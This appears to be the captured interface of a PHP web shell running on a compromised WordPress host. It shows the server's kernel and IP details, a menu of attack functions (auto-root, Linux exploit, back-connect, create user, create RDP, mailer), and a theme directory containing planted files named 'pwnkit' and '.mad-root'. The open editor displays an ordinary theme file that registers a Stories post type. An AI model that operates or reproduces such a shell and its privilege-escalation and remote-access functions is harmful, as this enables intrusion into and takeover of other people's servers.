Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
alpha /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
acf
[ DIR ]
drwxr-xr-x
acf-fields
[ DIR ]
drwxr-xr-x
acf-icon-field
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
acf-blocks.php
7.95
KB
-rw-r--r--
acf-enhancements.php
1.51
KB
-rw-r--r--
acf-fields.php
1.37
KB
-rw-r--r--
acf-load.php
919
B
-rw-r--r--
acf-options.php
425
B
-rw-r--r--
alpha-menu.php
2.08
KB
-rw-r--r--
class-alpha-menu-walker.php
4.56
KB
-rw-r--r--
custom-header.php
1.83
KB
-rw-r--r--
customizer.php
1.67
KB
-rw-r--r--
jetpack.php
1.42
KB
-rw-r--r--
product-post-type.php
7.68
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
story-post-type.php
3.96
KB
-rw-r--r--
template-functions.php
907
B
-rw-r--r--
template-tags.php
7.08
KB
-rw-r--r--
widgets.php
805
B
-rw-r--r--
wp-cli-acf-tools.php
10.51
KB
-rw-r--r--
wpcom.php
746
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : story-post-type.php
<?php /** * Stories Custom Post Type * * @package Alpha */ /** * Registers a new post type * * @uses $wp_post_types Inserts new post type object into the list * * @param string $post_type Post type key, must not exceed 20 characters * @param array|string $args See optional args description above. * @return object|WP_Error the registered post type object, or an error object */ function alpha_register_story_post_type() { $labels = array( 'name' => __( 'Stories', 'alpha' ), 'singular_name' => __( 'Story', 'alpha' ), 'add_new' => _x( 'Add New Story', 'alpha', 'alpha' ), 'add_new_item' => __( 'Add New Story', 'alpha' ), 'edit_item' => __( 'Edit Story', 'alpha' ), 'new_item' => __( 'New Story', 'alpha' ), 'view_item' => __( 'View Story', 'alpha' ), 'search_items' => __( 'Search Stories', 'alpha' ), 'not_found' => __( 'No Stories found', 'alpha' ), 'not_found_in_trash' => __( 'No Stories found in Trash', 'alpha' ), 'parent_item_colon' => __( 'Parent Story:', 'alpha' ), 'menu_name' => __( 'Stories', 'alpha' ), ); $args = array( 'labels' => $labels, 'hierarchical' => false, 'description' => 'description', 'taxonomies' => array(), 'public' => true, 'show_ui' => true, 'show_in_menu' => true, 'show_in_admin_bar' => true, 'menu_position' => null, 'menu_icon' => null, 'show_in_nav_menus' => true, 'publicly_queryable' => true, 'exclude_from_search' => true, 'has_archive' => false, 'query_var' => true, 'can_export' => true, 'rewrite' => false, 'capability_type' => 'post', 'supports' => array( 'title', 'editor', 'author', 'thumbnail', 'excerpt', 'custom-fields', 'trackbacks', 'comments', 'revisions', 'page-attributes', 'post-formats', ), ); register_post_type( 'story', $args ); } add_action( 'init', 'alpha_register_story_post_type' ); /** * Register Story Type Taxonomy * * @see https://developer.wordpress.org/reference/functions/register_taxonomy/ * * @return void */ function alpha_register_story_type_taxonomy() { $labels = array( 'name' => _x( 'Story Types', 'Taxonomy General Name', 'alpha' ), 'singular_name' => _x( 'Story Type', 'Taxonomy Singular Name', 'alpha' ), 'menu_name' => __( 'Story Types', 'alpha' ), 'all_items' => __( 'All Items', 'alpha' ), 'parent_item' => __( 'Parent Item', 'alpha' ), 'parent_item_colon' => __( 'Parent Item:', 'alpha' ), 'new_item_name' => __( 'New Item Name', 'alpha' ), 'add_new_item' => __( 'Add New Item', 'alpha' ), 'edit_item' => __( 'Edit Item', 'alpha' ), 'update_item' => __( 'Update Item', 'alpha' ), 'view_item' => __( 'View Item', 'alpha' ), 'separate_items_with_commas' => __( 'Separate items with commas', 'alpha' ), 'add_or_remove_items' => __( 'Add or remove items', 'alpha' ), 'choose_from_most_used' => __( 'Choose from the most used', 'alpha' ), 'popular_items' => __( 'Popular Items', 'alpha' ), 'search_items' => __( 'Search Items', 'alpha' ), 'not_found' => __( 'Not Found', 'alpha' ), 'no_terms' => __( 'No items', 'alpha' ), 'items_list' => __( 'Items list', 'alpha' ), 'items_list_navigation' => __( 'Items list navigation', 'alpha' ), ); $args = array( 'labels' => $labels, 'hierarchical' => false, 'public' => true, 'show_ui' => true, 'show_admin_column' => true, 'show_in_nav_menus' => true, 'show_tagcloud' => true, ); register_taxonomy( 'story_type', array( 'story' ), $args ); } add_action( 'init', 'alpha_register_story_type_taxonomy', 0 );
Close